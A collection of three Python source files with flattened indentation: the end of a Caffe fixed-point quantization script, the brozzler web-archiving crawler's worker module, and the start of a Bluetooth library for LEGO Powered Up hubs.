p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
bw_multiplier = j
not_found = False
break;
i = i + 2
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer multiplier'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_multiplier(net_BAC, net_proto_BAC, net_multiplier_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_multiplier = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Analyzing layer adder'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
bw_adder = j
not_found = False
break;
i = i + 2
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer adder'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_adder(net_BAC, net_proto_BAC, net_adder_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_adder = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Create Final Bit-Accurate quantized prototxt'
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Final Bit-Accurate quantized prototxt'
quantize_net_conv(net_proto_final, net_param_IL, bw_conv, convIL_reduction)
quantize_net_deconv(net_proto_final, net_param_IL, bw_conv, deconvIL_reduction)
quantize_net_fc(net_proto_final, net_param_IL, bw_fc, fcIL_reduction)
quantize_net_output(net_proto_final, net_output_IL, net_input_IL, bw_output, actIL_reduction)
quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
write_to_prototxt(net_proto_final, './temp_f.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
shared_dict,GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
#ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print '{}bit adder'.format(bw_adder)
print '{}bit multiplier'.format(bw_multiplier)
print 'Please fine-tune'
write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
|
worker.py | '''
brozzler/worker.py - BrozzlerWorker brozzles pages from the frontier, meaning
it runs youtube-dl on them, browses them and runs behaviors if appropriate,
scopes and adds outlinks to the frontier
Copyright (C) 2014-2017 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import logging
import brozzler
import brozzler.browser
import threading
import time
import youtube_dl
import urllib.request
import json
import PIL.Image
import io
import socket
import collections
import requests
import doublethink
import tempfile
import urlcanon
from requests.structures import CaseInsensitiveDict
import rethinkdb as r
import datetime
class ExtraHeaderAdder(urllib.request.BaseHandler):
def __init__(self, extra_headers):
self.extra_headers = extra_headers
self.http_request = self._http_request
self.https_request = self._http_request
def _http_request(self, req):
for h, v in self.extra_headers.items():
if h.capitalize() not in req.headers:
req.add_header(h, v)
return req
class YoutubeDLSpy(urllib.request.BaseHandler):
logger = logging.getLogger(__module__ + "." + __qualname__)
def __init__(self):
self.reset()
def _http_response(self, request, response):
txn = {
'url': request.full_url,
'method': request.get_method(),
'status_code': response.code,
'response_headers': response.headers,
}
self.transactions.append(txn)
return response
http_response = https_response = _http_response
def reset(self):
self.transactions = []
def final_bounces(self, url):
"""
Resolves redirect chains in self.transactions, returns a list of
Transaction representing the final redirect destinations of the given
url. There could be more than one if for example youtube-dl hit the
same url with HEAD and then GET requests.
"""
redirects = {}
for txn in self.transactions:
# XXX check http status 301,302,303,307? check for "uri" header
# as well as "location"? see urllib.request.HTTPRedirectHandler
if 'location' in txn['response_headers']:
redirects[txn['url']] = txn
final_url = url
while final_url in redirects:
final_url = redirects.pop(final_url)['response_headers']['location']
final_bounces = []
for txn in self.transactions:
if txn['url'] == final_url:
final_bounces.append(txn)
return final_bounces
class BrozzlerWorker:
logger = logging.getLogger(__module__ + "." + __qualname__)
HEARTBEAT_INTERVAL = 20.0
def __init__(
self, frontier, service_registry=None, max_browsers=1,
chrome_exe="chromium-browser", warcprox_auto=False, proxy=None):
self._frontier = frontier
self._service_registry = service_registry
self._max_browsers = max_browsers
self._warcprox_auto = warcprox_auto
self._proxy = proxy
assert not (warcprox_auto and proxy)
self._proxy_is_warcprox = None
self._browser_pool = brozzler.browser.BrowserPool(
max_browsers, chrome_exe=chrome_exe, ignore_cert_errors=True)
self._browsing_threads = set()
self._browsing_threads_lock = threading.Lock()
self._thread = None
self._start_stop_lock = threading.Lock()
self._shutdown = threading.Event()
def _proxy_for(self, site):
if self._proxy:
return self._proxy
elif site.proxy:
return site.proxy
elif self._warcprox_auto:
svc = self._service_registry.available_service('warcprox')
if svc is None:
raise brozzler.ProxyError(
'no available instances of warcprox in the service '
'registry')
site.proxy = '%s:%s' % (svc['host'], svc['port'])
site.save()
self.logger.info(
'chose warcprox instance %r from service registry for %r',
site.proxy, site)
return site.proxy
return None
def _using_warcprox(self, site):
if self._proxy:
if self._proxy_is_warcprox is None:
try:
response = requests.get('http://%s/status' % self._proxy)
status = json.loads(response.text)
self._proxy_is_warcprox = (status['role'] == 'warcprox')
except Exception as e:
self._proxy_is_warcprox = False
logging.info(
'%s %s warcprox', self._proxy,
'IS' if self._proxy_is_warcprox else 'IS NOT')
return self._proxy_is_warcprox
else:
return bool(site.proxy or self._warcprox_auto)
def _youtube_dl(self, destdir, site):
def ydl_progress(*args, **kwargs):
# in case youtube-dl takes a long time, heartbeat site.last_claimed
# to prevent another brozzler-worker from claiming the site
try:
if site.rr and doublethink.utcnow() - site.last_claimed > datetime.timedelta(minutes=7):
self.logger.debug(
'heartbeating site.last_claimed to prevent another '
'brozzler-worker claiming this site id=%r', site.id)
site.last_claimed = doublethink.utcnow()
site.save()
except:
self.logger.debug(
'problem heartbeating site.last_claimed site id=%r',
site.id, exc_info=True)
ydl_opts = {
"outtmpl": "{}/ydl%(autonumber)s.out".format(destdir),
"verbose": False,
"retries": 1,
"logger": logging.getLogger("youtube_dl"),
"nocheckcertificate": True,
"hls_prefer_native": True,
"noprogress": True,
"nopart": True,
"no_color": True,
"progress_hooks": [ydl_progress],
# https://github.com/rg3/youtube-dl/blob/master/README.md#format-selection
# "best: Select the best quality format represented by a single
# file with video and audio."
"format": "best/bestvideo+bestaudio",
}
if self._proxy_for(site):
ydl_opts["proxy"] = "http://{}".format(self._proxy_for(site))
## XXX (sometimes?) causes chrome debug websocket to go through
## proxy. Maybe not needed thanks to hls_prefer_native.
## # see https://github.com/rg3/youtube-dl/issues/6087
## os.environ["http_proxy"] = "http://{}".format(self._proxy_for(site))
ydl = youtube_dl.YoutubeDL(ydl_opts)
if site.extra_headers():
ydl._opener.add_handler(ExtraHeaderAdder(site.extra_headers()))
ydl.brozzler_spy = YoutubeDLSpy()
ydl._opener.add_handler(ydl.brozzler_spy)
return ydl
def _warcprox_write_record(
self, warcprox_address, url, warc_type, content_type,
payload, extra_headers=None):
headers = {"Content-Type":content_type,"WARC-Type":warc_type,"Host":"N/A"}
if extra_headers:
headers.update(extra_headers)
request = urllib.request.Request(url, method="WARCPROX_WRITE_RECORD",
headers=headers, data=payload)
# XXX setting request.type="http" is a hack to stop urllib from trying
# to tunnel if url is https
request.type = "http"
request.set_proxy(warcprox_address, "http")
try:
with urllib.request.urlopen(request) as response:
if response.getcode() != 204:
self.logger.warn(
'got "%s %s" response on warcprox '
'WARCPROX_WRITE_RECORD request (expected 204)',
response.getcode(), response.reason)
except urllib.error.HTTPError as e:
self.logger.warn(
'got "%s %s" response on warcprox '
'WARCPROX_WRITE_RECORD request (expected 204)',
e.getcode(), e.info())
except urllib.error.URLError as e:
raise brozzler.ProxyError(
'proxy error on WARCPROX_WRITE_RECORD %s' % url) from e
except ConnectionError as e:
raise brozzler.ProxyError(
'proxy error on WARCPROX_WRITE_RECORD %s' % url) from e
def _remember_videos(self, page, ydl_spy):
if not 'videos' in page:
page.videos = []
for txn in ydl_spy.transactions:
if (txn['response_headers'].get_content_type().startswith('video/')
and txn['method'] == 'GET'
and txn['status_code'] in (200, 206)):
video = {
'blame': 'youtube-dl',
'url': txn['url'],
'response_code': txn['status_code'],
'content-type': txn['response_headers'].get_content_type(),
}
if 'content-length' in txn['response_headers']:
video['content-length'] = int(
txn['response_headers']['content-length'])
if 'content-range' in txn['response_headers']:
video['content-range'] = txn[
'response_headers']['content-range']
logging.debug('embedded video %s', video)
page.videos.append(video)
def _try_youtube_dl(self, ydl, site, page):
try:
self.logger.info("trying youtube-dl on {}".format(page))
with brozzler.thread_accept_exceptions():
info = ydl.extract_info(page.url)
self._remember_videos(page, ydl.brozzler_spy)
# logging.info('XXX %s', json.dumps(info))
if self._using_warcprox(site):
info_json = json.dumps(info, sort_keys=True, indent=4)
self.logger.info(
"sending WARCPROX_WRITE_RECORD request to warcprox "
"with youtube-dl json for %s", page)
self._warcprox_write_record(
warcprox_address=self._proxy_for(site),
url="youtube-dl:%s" % str(urlcanon.semantic(page.url)),
warc_type="metadata",
content_type="application/vnd.youtube-dl_formats+json;charset=utf-8",
payload=info_json.encode("utf-8"),
extra_headers=site.extra_headers())
except brozzler.ShutdownRequested as e:
raise
except BaseException as e:
if hasattr(e, "exc_info") and e.exc_info[0] == youtube_dl.utils.UnsupportedError:
pass
elif (hasattr(e, "exc_info")
and e.exc_info[0] == urllib.error.HTTPError
and hasattr(e.exc_info[1], "code")
and e.exc_info[1].code == 420):
raise brozzler.ReachedLimit(e.exc_info[1])
elif (hasattr(e, 'exc_info')
and e.exc_info[0] == urllib.error.URLError
and self._proxy_for(site)):
# connection problem when using a proxy == proxy error (XXX?)
raise brozzler.ProxyError(
'youtube-dl hit apparent proxy error from '
'%s' % page.url) from e
else:
raise
def full_and_thumb_jpegs(self, large_png):
img = PIL.Image.open(io.BytesIO(large_png))
out = io.BytesIO()
img.save(out, "jpeg", quality=95)
full_jpeg = out.getbuffer()
thumb_width = 300
thumb_height = (thumb_width / img.size[0]) * img.size[1]
img.thumbnail((thumb_width, thumb_height))
out = io.BytesIO()
img.save(out, "jpeg", quality=95)
thumb_jpeg = out.getbuffer()
return full_jpeg, thumb_jpeg
def brozzle_page(self, browser, site, page, on_screenshot=None):
self.logger.info("brozzling {}".format(page))
try:
with tempfile.TemporaryDirectory(prefix='brzl-ydl-') as tempdir:
ydl = self._youtube_dl(tempdir, site)
ydl_spy = ydl.brozzler_spy # remember for later
self._try_youtube_dl(ydl, site, page)
except brozzler.ReachedLimit as e:
raise
except brozzler.ShutdownRequested:
raise
except brozzler.ProxyError:
raise
except Exception as e:
if (hasattr(e, 'exc_info') and len(e.exc_info) >= 2
and hasattr(e.exc_info[1], 'code')
and e.exc_info[1].code == 430):
self.logger.info(
'youtube-dl got %s %s processing %s',
e.exc_info[1].code, e.exc_info[1].msg, page.url)
else:
self.logger.error(
'youtube_dl raised exception on %s', page,
exc_info=True)
if self._needs_browsing(page, ydl_spy):
self.logger.info('needs browsing: %s', page)
outlinks = self._browse_page(browser, site, page, on_screenshot)
return outlinks
else:
if not self._already_fetched(page, ydl_spy):
self.logger.info('needs fetch: %s', page)
self._fetch_url(site, page)
else:
self.logger.info('already fetched: %s', page)
return []
def _browse_page(self, browser, site, page, on_screenshot=None):
def _on_screenshot(screenshot_png):
if on_screenshot:
on_screenshot(screenshot_png)
if self._using_warcprox(site):
self.logger.info(
"sending WARCPROX_WRITE_RECORD request to %s with "
"screenshot for %s", self._proxy_for(site), page)
screenshot_jpeg, thumbnail_jpeg = self.full_and_thumb_jpegs(
screenshot_png)
self._warcprox_write_record(
warcprox_address=self._proxy_for(site),
url="screenshot:%s" % str(urlcanon.semantic(page.url)),
warc_type="resource", content_type="image/jpeg",
payload=screenshot_jpeg,
extra_headers=site.extra_headers())
self._warcprox_write_record(
warcprox_address=self._proxy_for(site),
url="thumbnail:%s" % str(urlcanon.semantic(page.url)),
warc_type="resource", content_type="image/jpeg",
payload=thumbnail_jpeg,
extra_headers=site.extra_headers())
def _on_response(chrome_msg):
if ('params' in chrome_msg
and 'response' in chrome_msg['params']
and 'mimeType' in chrome_msg['params']['response']
and chrome_msg['params']['response'].get('mimeType', '').startswith('video/')
and chrome_msg['params']['response'].get('status') in (200, 206)):
video = {
'blame': 'browser',
'url': chrome_msg['params']['response'].get('url'),
'response_code': chrome_msg['params']['response']['status'],
'content-type': chrome_msg['params']['response']['mimeType'],
}
response_headers = CaseInsensitiveDict(
chrome_msg['params']['response']['headers'])
if 'content-length' in response_headers:
video['content-length'] = int(response_headers['content-length'])
if 'content-range' in response_headers:
video['content-range'] = response_headers['content-range']
logging.debug('embedded video %s', video)
if not 'videos' in page:
page.videos = []
page.videos.append(video)
if not browser.is_running():
browser.start(
proxy=self._proxy_for(site),
cookie_db=site.get('cookie_db'))
final_page_url, outlinks = browser.browse_page(
page.url, extra_headers=site.extra_headers(),
behavior_parameters=site.get('behavior_parameters'),
username=site.get('username'), password=site.get('password'),
user_agent=site.get('user_agent'),
on_screenshot=_on_screenshot, on_response=_on_response,
hashtags=page.hashtags)
if final_page_url != page.url:
page.note_redirect(final_page_url)
return outlinks
def _fetch_url(self, site, page):
proxies = None
if self._proxy_for(site):
proxies = {
'http': 'http://%s' % self._proxy_for(site),
'https': 'http://%s' % self._proxy_for(site),
}
self.logger.info('fetching %s', page)
try:
# response is ignored
requests.get(
page.url, proxies=proxies, headers=site.extra_headers(),
verify=False)
except requests.exceptions.ProxyError as e:
raise brozzler.ProxyError(
'proxy error fetching %s' % page.url) from e
def _needs_browsing(self, page, brozzler_spy):
final_bounces = brozzler_spy.final_bounces(page.url)
if not final_bounces:
return True
for txn in final_bounces:
if txn['response_headers'].get_content_type() in [
'text/html', 'application/xhtml+xml']:
return True
return False
def _already_fetched(self, page, brozzler_spy):
for txn in brozzler_spy.final_bounces(page.url):
if (txn['method'] == 'GET' and txn['status_code'] == 200):
return True
return False
def brozzle_site(self, browser, site):
try:
start = time.time()
page = None
self._frontier.honor_stop_request(site)
self.logger.info(
"brozzling site (proxy=%r) %r",
self._proxy_for(site), site)
while time.time() - start < 7 * 60:
site.refresh()
self._frontier.honor_stop_request(site)
page = self._frontier.claim_page(site, "%s:%s" % (
socket.gethostname(), browser.chrome.port))
if (page.needs_robots_check and
not brozzler.is_permitted_by_robots(
site, page.url, self._proxy_for(site))):
logging.warn("page %s is blocked by robots.txt", page.url)
page.blocked_by_robots = True
self._frontier.completed_page(site, page)
else:
outlinks = self.brozzle_page(browser, site, page)
self._frontier.completed_page(site, page)
self._frontier.scope_and_schedule_outlinks(
site, page, outlinks)
if browser.is_running():
site.cookie_db = browser.chrome.persist_and_read_cookie_db()
page = None
except brozzler.ShutdownRequested:
self.logger.info("shutdown requested")
except brozzler.NothingToClaim:
self.logger.info("no pages left for site %s", site)
except brozzler.ReachedLimit as e:
self._frontier.reached_limit(site, e)
except brozzler.CrawlStopped:
self._frontier.finished(site, "FINISHED_STOP_REQUESTED")
# except brozzler.browser.BrowsingAborted:
# self.logger.info("{} shut down".format(browser))
except brozzler.ProxyError as e:
if self._warcprox_auto:
logging.error(
'proxy error (site.proxy=%s), will try to choose a '
'healthy instance next time site is brozzled: %s',
site.proxy, e)
site.proxy = None
else:
# using brozzler-worker --proxy, nothing to do but try the
# same proxy again next time
logging.error(
'proxy error (site.proxy=%r): %r', site.proxy, e)
except:
self.logger.critical("unexpected exception", exc_info=True)
finally:
if start:
site.active_brozzling_time = (site.active_brozzling_time or 0) + time.time() - start
self._frontier.disclaim_site(site, page)
def _brozzle_site_thread_target(self, browser, site):
try:
self.brozzle_site(browser, site)
finally:
browser.stop()
self._browser_pool.release(browser)
with self._browsing_threads_lock:
self._browsing_threads.remove(threading.current_thread())
def _service_heartbeat(self):
if hasattr(self, "status_info"):
status_info = self.status_info
else:
status_info = {
"role": "brozzler-worker",
"ttl": self.HEARTBEAT_INTERVAL * 3,
}
status_info["load"] = 1.0 * self._browser_pool.num_in_use() / self._browser_pool.size
status_info["browser_pool_size"] = self._browser_pool.size
status_info["browsers_in_use"] = self._browser_pool.num_in_use()
try:
self.status_info = self._service_registry.heartbeat(status_info)
self.logger.trace(
"status in service registry: %s", self.status_info)
except r.ReqlError as e:
self.logger.error(
"failed to send heartbeat and update service registry "
"with info %s: %s", status_info, e)
def _service_heartbeat_if_due(self):
'''Sends service registry heartbeat if due'''
due = False
if self._service_registry:
if not hasattr(self, "status_info"):
due = True
else:
d = doublethink.utcnow() - self.status_info["last_heartbeat"]
due = d.total_seconds() > self.HEARTBEAT_INTERVAL
if due:
self._service_heartbeat()
def run(self):
self.logger.info("brozzler worker starting")
try:
latest_state = None
while not self._shutdown.is_set():
self._service_heartbeat_if_due()
try:
browser = self._browser_pool.acquire()
try:
site = self._frontier.claim_site("%s:%s" % (
socket.gethostname(), browser.chrome.port))
th = threading.Thread(
target=self._brozzle_site_thread_target,
args=(browser, site),
name="BrozzlingThread:%s" % browser.chrome.port,
daemon=True)
with self._browsing_threads_lock:
self._browsing_threads.add(th)
th.start()
except:
self._browser_pool.release(browser)
raise
except brozzler.browser.NoBrowsersAvailable:
if latest_state != "browsers-busy":
self.logger.info(
"all %s browsers are busy", self._max_browsers)
latest_state = "browsers-busy"
except brozzler.NothingToClaim:
pass
time.sleep(0.5)
self.logger.info("shutdown requested")
except r.ReqlError as e:
self.logger.error(
"caught rethinkdb exception, will try to proceed",
exc_info=True)
except brozzler.ShutdownRequested:
self.logger.info("shutdown requested")
except:
self.logger.critical(
"thread exiting due to unexpected exception",
exc_info=True)
finally:
if self._service_registry and hasattr(self, "status_info"):
try:
self._service_registry.unregister(self.status_info["id"])
except:
self.logger.error(
"failed to unregister from service registry",
exc_info=True)
self.logger.info(
'shutting down %s brozzling threads',
len(self._browsing_threads))
with self._browsing_threads_lock:
for th in self._browsing_threads:
if th.is_alive():
brozzler.thread_raise(th, brozzler.ShutdownRequested)
self._browser_pool.shutdown_now()
# copy to avoid "RuntimeError: Set changed size during iteration"
thredz = set(self._browsing_threads)
for th in thredz:
th.join()
def start(self):
with self._start_stop_lock:
if self._thread:
self.logger.warn(
'ignoring start request because self._thread is '
'not None')
return
self._thread = threading.Thread(
target=self.run, name="BrozzlerWorker")
self._thread.start()
def shutdown_now(self):
self.stop()
def stop(self):
self._shutdown.set()
def is_alive(self):
return self._thread and self._thread.is_alive()
|
lwp.py | import bleak
import asyncio
import traceback
import struct
import time
import threading
import atexit
import sys
UART_UUID="00001623-1212-efde-1623-785feabcd123"
CHAR_UUID="00001624-1212-efde-1623-785feabcd123"
LEGO_DEVICES={0x0001:"Motor",0x0002:"System Train Motor",0x0005:"Button",0x0008:"Light",0x0014:"Voltage",0x0015:"Current",0x0016:"Piezo Tone (Sound)",0x0017:"RGB Light",0x0022:"External Tilt Sensor",0x0023:"Motion Sensor",0x0025:"Vision Sensor",0x0026:"External Motor with Tacho",0x0027:"Internal Motor with Tacho",0x0028:"Internal Tilt",0x0029:"Duplo Train Motor",0x002A:"Duplo Train Speaker",0x002B:"Duplo Train Color",0x002C:"Duplo Train Speedometer",0x002E:"Technic Control+ Large Motor",0x002F:"Technic Control+ XL Motor",0x0036:"Powered Up Hub IMU Gesture",0x0037:"Remote Button",0x0038:"Remote Signal Level",0x0039:"Powered Up Hub IMU Accelerometer",0x003A:"Powered Up Hub IMU Gyro",0x003B:"Powered Up Hub IMU Position",0x003C:"Powered Up Hub IMU Temperature"}
PORT_INFO_TYPES={"NAME": 0,"VALUE FORMAT":0x80,"RAW Range":0x01,"PCT Range":0x02,"SI Range":0x03,"Symbol":0x04,"MAPPING": 0x05}
PORT_MODE_INFO_MAPPING_BITS=["NA","NA","Discrete","Relative","Absolute","NA","Supports Functional Mapping 2.0","Supports NULL"]
PORT_MODE_INFO_DATASET_TYPES=["8b","16b","32b","float"]
PORT_OUTPUT_FEEDBACK={0x01:"Buffer Empty + Command In Progress",0x02:"Buffer Empty + Command Completed",0x04:"Current Command(s) Discarded",0x08:"Idle",0x10:"Busy/Full"}
RGB_LED_COLORS=["off","magenta","purple","blue","cyan","turquoise","green","yellow","orange","red","white"]
MOTOR_END_STATE={"float":0,"hold":1,"brake":2}
VISION_SENSOR_COLOR_DECODE={0:"black",3:"blue",5:"green",7:"yellow",9:"red",10:"white",255:"UNKNOWN"}
VISION_SENSOR_MODES=["basic_color","proximity","count","reflect","ambience","color_o","rgb_color"]
GYRO_SENSOR_VALUES=["roll","pitch","yaw"]
ACCELEROMETER_SENSOR_VALUES=["x","z","y"]
class Hub:
_hc={}
_il={}
_ol={}
_hl=[]
_id=0
_br=False
def __init_subclass__(cls):
Hub._hc[cls._m_id]=cls
@staticmethod
def run(f,*a,**kw):
lp=asyncio.get_event_loop()
def _end(es=0):
for h in Hub._hl:
h.disconnect()
time.sleep(0.2)
Hub._br=True
while (lp.is_running()==True):
pass
lp.stop()
lp.close()
sys.exit(es)
def _run(f,a,kw):
try:
f(*a,**kw)
_end(es=0)
except Exception as e:
traceback.print_exception(None,e,e.__traceback__)
_end(es=1)
thr=threading.Thread(target=_run,args=(f,a,kw),kwargs={})
thr.start()
async def _loop():
try:
while (Hub._br==False):
while (len(Hub._ol.keys())==0):
if (Hub._br==True):
return
await asyncio.sleep(0.001)
id_=list(Hub._ol.keys())[0]
t,a,kw=Hub._ol.pop(id_);
if (t==0):
kw["loop"]=asyncio.get_event_loop()
Hub._il[id_]=await bleak.discover(*a,**kw)
elif (t==1):
kw["loop"]=asyncio.get_event_loop()
dv=bleak.BleakClient(*a,**kw)
await dv.connect()
Hub._il[id_]=dv
elif (t==2):
await a[0].start_notify(CHAR_UUID,*a[1:],**kw)
elif (t==3):
await a[0].write_gatt_char(CHAR_UUID,*a[1:],**kw)
else:
print(f"UNKNOWN: {id_} => [{t},{a},{kw}]")
except Exception as e:
traceback.print_exception(None,e,e.__traceback__)
_end()
atexit.register(_end)
asyncio.run(_loop())
@staticmethod
def find(cfl=[],i=5,t=None,cb=lambda *a,**kw:None):
hl=[]
al=[]
while (i>0 and len(hl)==0):
dl=Hub._wait([0,[],{"timeout":1}])
dl=[d for d in dl if UART_UUID in d.metadata["uuids"]]
for d in dl:
dt=list(d.metadata["manufacturer_data"].values())[0]
if (d.address not in al):
if (t is None):
for m_id in Hub._hc.keys():
if (dt[1]==m_id):
print(d.address)
dc=Hub._wait([1,[],{"address":d.address}])
h=Hub._hc[m_id](dc)
h._init()
hl+=[h]
al+=[d.address]
cb(h)
break
else:
if (dt[1]==t._m_id):
print(d.address)
dc=Hub._wait([1,[],{"address":d.address}])
h=t(dc)
h._init()
hl+=[h]
al+=[d.address]
cb(h)
break
i-=1
if (len(cfl)==0):
return hl
o=[]
for cf in cfl:
o+=[[]]
for h in hl:
pl=h.get_port(list(cf.keys()))
ok=True
for i in range(0,len(pl)):
if (pl[i]._id!=list(cf.values())[i]._id):
ok=False
break
else:
pl[i].setup()
if (ok==True):
o[-1]+=[h]
return o
@staticmethod
def _wait(dt,w=True,r=True):
id_=Hub._id+0
Hub._ol[id_]=dt
Hub._id+=1
if (w==False):
return None
while (id_ in Hub._ol.keys()):
pass
if (r==False):
return None
while (id_ not in Hub._il.keys()):
pass
return Hub._il.pop(id_)
def __init__(self,d,nm):
self.d=d
self._ol=[]
self._port_dt={}
self._dl={}
self.name=nm
Hub._hl+=[self]
def connections(self):
for p in list(self._port_dt.keys()):
print(f"{p} => {self._port_dt[p]['name']}")
return None
def get_port(self,pl,wait=True):
all_=False
if (type(pl)==int):
pl=[pl]
if (type(pl)==str):
if (pl=="all"):
all_=True
pl=[*self._port_dt.keys()]
else:
pl=pl.split(",")
for p in pl:
while (wait==True and (p not in self._port_dt.keys() or "_ready" not in self._port_dt[p].keys() or self._port_dt[p]["_ready"]==False)):
pass
if (all_==True and len(pl)!=len(self._port_dt.keys())):
return self.get_port("all",wait=wait)
return [self._port_dt[p]["driver"] for p in pl]
def get_port_modes(self,pl,wait=True):
all_=False
if (type(pl)==int):
pl=[pl]
if (type(pl)==str):
if (pl=="all"):
all_=True
pl=[*self._port_dt.keys()]
else:
pl=pl.split(",")
for p in pl:
while (wait==True and (p not in self._port_dt.keys() or "_modes_ready" not in self._port_dt[p].keys() or self._port_dt[p]["_modes_ready"]==False)):
pass
if (all_==True and len(pl)!=len(self._port_dt.keys())):
return self.get_port("all",wait=wait)
return [self._port_dt[p]["modes"] for p in pl]
def wait_until_data(self,pl):
all_=False
if (type(pl)==int):
pl=[pl]
if (type(pl)==str):
if (pl=="all"):
all_=True
pl=[*self._port_dt.keys()]
else:
pl=pl.split(",")
self.get_port(pl,wait=True)
for p in pl:
while ((self._port_dt[p]["driver"]._dt==False)):
pass
if (all_==True and len(pl)!=len(self._port_dt.keys())):
self.get_port("all",wait=wait)
break
def disconnect(self):
self._send([0x00,0x02,0x01],wait=False)
def _init(self):
def _msg(s,dt):
thr=threading.Thread(target=self._msg,args=(s,dt),kwargs={})
thr.start()
Hub._wait([2,[self.d,_msg],{}],r=False)
def _send(self,dt,wait=True):
Hub._wait([3,[self.d,bytearray([len(dt)+1]+dt)],{}],w=wait,r=False)
def _msg(self,s,dt):
try:
dt=list(dt)[2:]
t,dt=dt[0],dt[1:]
if (t==0x02):
pass
elif (t==0x04):
p,e,dt=dt[0],dt[1],dt[2:]
if (e!=0):
id_,dt=dt[0],dt[2:]
if (p not in self._port_dt.keys()):
self._port_dt[p]={}
self._port_dt[p]["_ready"]=False
self._port_dt[p]["id"]=id_
self._port_dt[p]["name"]=(LEGO_DEVICES[id_] if id_ in LEGO_DEVICES.keys() else f"UNKNOWN #{p}")
if (e==2):
p0,p1=dt
self._port_dt[p]["virtual"]=(p0,p1)
print("VIRTUAL",p,p0,p1)
self._port_dt[p]["driver"]=HubDriver.get(id_)(self,p)
self._dl[p]=self._port_dt[p]["driver"]
self._port_dt[p]["_ready"]=True
elif (t==0x05):
ct,ec=dt
if (ec==1):
print(f"ERROR: {hex(ct)} => ACK")
elif (ec==2):
print(f"ERROR: {hex(ct)} => MACK")
elif (ec==3):
print(f"ERROR: {hex(ct)} => Buffer Overflow")
elif (ec==4):
print(f"ERROR: {hex(ct)} => Timeout")
elif (ec==5):
print(f"ERROR: {hex(ct)} => Command Not Recognised")
elif (ec==6):
print(f"ERROR: {hex(ct)} => Invalid Use")
elif (ec==7):
print(f"ERROR: {hex(ct)} => Overcurrent")
elif (ec==8):
print(f"ERROR: {hex(ct)} => Internal Error")
elif (t==0x43):
p,m,dt=dt[0],dt[1],dt[2:]
if ("modes" not in self._port_dt[p].keys()):
self._port_dt[p]["modes"]={}
self._port_dt[p]["_modes_ql"]=0
